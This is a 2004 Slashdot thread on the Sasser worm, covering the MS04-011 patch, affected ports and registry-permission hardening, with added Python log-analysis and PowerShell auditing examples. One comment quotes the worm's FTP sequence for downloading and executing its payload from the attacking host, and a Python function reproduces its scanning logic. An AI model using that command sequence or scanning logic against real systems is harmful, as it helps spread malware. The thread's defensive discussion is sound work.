New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:
http://www.microsoft.com/security/incident/sasser.asp
Toolbars and similar items would not be prevented by blocking mutexes as far as I know, because they don't create one. They run under the IE process.
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
"I will trust Google to 'do no evil' until the founders no longer run it." Hello Alphabet.
Interesting concept, but many programs use lots of mutexes, and some don't use them at all.
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked them by mutex.
You can set permissions in the registry per key.
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run
It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
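A worked example of the scanning behaviour quoted above, added here and not code from the thread or from Symantec. It models the target mix (50% fully random, 25% same first octet, 25% same first two octets) and then turns the same idea around into a check a defender can run over a firewall log: a worm that favours its own /8 and /16 makes a nearby infected host far more likely to probe you than a distant one, so the sources hitting the thread's ports (TCP 445, 5554, 9996) cluster around your own address. The iptables-style log lines and the host address 192.0.2.10 are constructed for the example.

```python
"""Added example; not code from the thread or from any vendor write-up."""
import ipaddress
import random
import re
from collections import Counter

SASSER_PORTS = {445, 5554, 9996}   # TCP ports named in the thread


def sasser_target(host: str, rng: random.Random) -> tuple[str, str]:
    """Pick one scan target the way the worm is described to, returning
    (dotted_ip, bucket) so the caller can see which branch was taken."""
    h = [int(o) for o in host.split(".")]
    r = rng.random()
    if r < 0.50:                      # 50%: completely random
        octets = [rng.randrange(256) for _ in range(4)]
        bucket = "random"
    elif r < 0.75:                    # 25%: same first octet as the host
        octets = [h[0]] + [rng.randrange(256) for _ in range(3)]
        bucket = "same_first_octet"
    else:                             # 25%: same first two octets
        octets = h[:2] + [rng.randrange(256) for _ in range(2)]
        bucket = "same_first_two"
    return ".".join(map(str, octets)), bucket


def sample_targets(host: str, n: int, seed: int = 1) -> list[tuple[str, str]]:
    rng = random.Random(seed)
    return [sasser_target(host, rng) for _ in range(n)]


def target_mix(host: str, n: int = 20000, seed: int = 1) -> dict[str, float]:
    """Empirical share of each bucket; lands near 0.50 / 0.25 / 0.25."""
    counts = Counter(bucket for _, bucket in sample_targets(host, n, seed))
    return {bucket: c / n for bucket, c in counts.items()}


def bucket_matches(host: str, ip: str, bucket: str) -> bool:
    """Sanity check: valid IPv4 address sharing the prefix its bucket promises."""
    ipaddress.IPv4Address(ip)                      # raises if malformed
    h, t = host.split("."), ip.split(".")
    keep = {"random": 0, "same_first_octet": 1, "same_first_two": 2}[bucket]
    return h[:keep] == t[:keep]


LOG_RE = re.compile(
    r"SRC=(?P<src>\d+\.\d+\.\d+\.\d+) DST=\d+\.\d+\.\d+\.\d+ "
    r"PROTO=TCP .*?DPT=(?P<dpt>\d+)")


def locality_profile(log_lines, local_ip: str) -> dict:
    """Distinct sources probing Sasser ports, and the share of them inside
    our own /8 and /16. A uniformly random scanner would put about 1/256 of
    sources in our /8 and 1/65536 in our /16; with the mix above, an infected
    host in our /16 is tens of thousands of times more likely to pick us than
    a distant one, so a large share from our own prefixes is the fingerprint."""
    local = local_ip.split(".")
    sources = set()
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and int(m.group("dpt")) in SASSER_PORTS:
            sources.add(m.group("src"))
    n = len(sources)
    same8 = sum(1 for s in sources if s.split(".")[:1] == local[:1])
    same16 = sum(1 for s in sources if s.split(".")[:2] == local[:2])
    return {"sources": n,
            "same_8": same8 / n if n else 0.0,
            "same_16": same16 / n if n else 0.0}


# Constructed log sample: four distinct sources on Sasser ports (two in our
# /8, one of those also in our /16) plus an unrelated port-80 hit.
SAMPLE_LOG = """\
May  1 12:00:01 fw kernel: IN=eth0 SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=1042 DPT=445
May  1 12:00:05 fw kernel: IN=eth0 SRC=192.5.99.3 DST=192.0.2.10 PROTO=TCP SPT=1044 DPT=445
May  1 12:00:09 fw kernel: IN=eth0 SRC=192.0.2.77 DST=192.0.2.10 PROTO=TCP SPT=1050 DPT=445
May  1 12:00:13 fw kernel: IN=eth0 SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP SPT=1051 DPT=5554
May  1 12:00:14 fw kernel: IN=eth0 SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=1043 DPT=9996
May  1 12:00:20 fw kernel: IN=eth0 SRC=10.8.8.8 DST=192.0.2.10 PROTO=TCP SPT=40000 DPT=80
""".splitlines()

if __name__ == "__main__":
    print(target_mix("192.0.2.10"))
    print(locality_profile(SAMPLE_LOG, "192.0.2.10"))
```

The 128 scanning threads the quote mentions are not modelled; they only change how fast the same distribution is drawn from, which is why the CPU load, not the target choice, is what makes an infected box crawl.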
Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...
Err, Startup Monitor does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
My email addy? should be easy enough.
Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.
Note this only works on NT-based systems (e.g., WinXP)
It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot TeaTimer. It's available with the newest release candidate. You can download that here (link at the bottom of the forum post). Just run Spybot S&D, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the TeaTimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.
End of lesson. You may press the button.
The patches were released on the 13th of April; there were four patches which, put together, fix 20 different vulnerabilities.
You've probably already installed it, just look for KB835732 in your list of installed updates.
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
Access attempts will show up in the event viewer.
Note: use regedt32.exe for Win2000 or earlier. For later versions, regedit.exe does everything (under Edit->Permissions).
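A worked version of the two suggestions made in this part of the thread (restrict who can write the Run key, then audit attempts to write it), added here and not posted by anyone in the discussion. It assumes an elevated PowerShell session on Windows Vista or later, where Get-Acl/Set-Acl and auditpol do what the regedt32 and Local Security Policy dialogs described above do by hand; the principal names, the ContainerInherit flags and the AuditProbe value name are assumptions.

```powershell
# Added example (not from the thread). Run elevated; assumes Vista or later.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

# --- 1. Permissions: deny value creation/modification to ordinary users ---
# A Deny ACE beats any Allow, so scope it to BUILTIN\Users rather than
# Everyone: a Deny for Everyone also locks out Administrators and installers.
$acl     = Get-Acl -Path $key -Audit          # -Audit reads the SACL as well as the DACL
$rights  = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey'
$inherit = [System.Security.AccessControl.InheritanceFlags]::ContainerInherit
$prop    = [System.Security.AccessControl.PropagationFlags]::None
$deny    = New-Object System.Security.AccessControl.RegistryAccessRule('BUILTIN\Users', $rights, $inherit, $prop, 'Deny')
$acl.AddAccessRule($deny)

# --- 2. Auditing: record every write attempt, successful or not, by anyone ---
$auditRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete'
$audit = New-Object System.Security.AccessControl.RegistryAuditRule('Everyone', $auditRights, $inherit, $prop, 'Success, Failure')
$acl.AddAuditRule($audit)
Set-Acl -Path $key -AclObject $acl            # writing a SACL needs SeSecurityPrivilege (elevated admin has it)

# The SACL does nothing until the Object Access / Registry audit policy is on
# (the thread's Local Security Policy -> Audit Policy step, done from the CLI).
auditpol /set /subcategory:"Registry" /success:enable /failure:enable

# --- 3. Check it works: write and remove a test value as admin, then look for the event ---
Set-ItemProperty -Path $key -Name 'AuditProbe' -Value 'C:\nonexistent.exe'   # assumed value name
Remove-ItemProperty -Path $key -Name 'AuditProbe'
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4657, 4663 } -MaxEvents 50 |
    Where-Object { $_.Message -match 'CurrentVersion\\Run' } |
    Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
```

Two caveats the dialogs in the thread do not make obvious. Code that arrives through an LSASS overflow runs as LocalSystem, so a Deny ACE scoped to Users does not stop it, although the audit ACE still records the write, which is the useful part for incident response. And because Deny wins over Allow, broaden step 1 to Everyone only on a machine where nobody, including software installers, is ever expected to add a startup entry.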
Someone here obviously isn't using the 2.6 kernel tree with the happy new scheduler and timer. I can be happily compiling openoffice and still watch dvd's, play music, browse the web...anything else?
Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1.
Uh... what?
Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. (emphasis mine)
"...always new atoms but always doing the same dance, remembering what the dance was yesterday." -Richard Feynman
Your own fault disabling the Crypto service. Without it the winupdate cannot verify the signatures. Those stupid 'xp optimization guides' commonly tell you that disabling it is a good idea...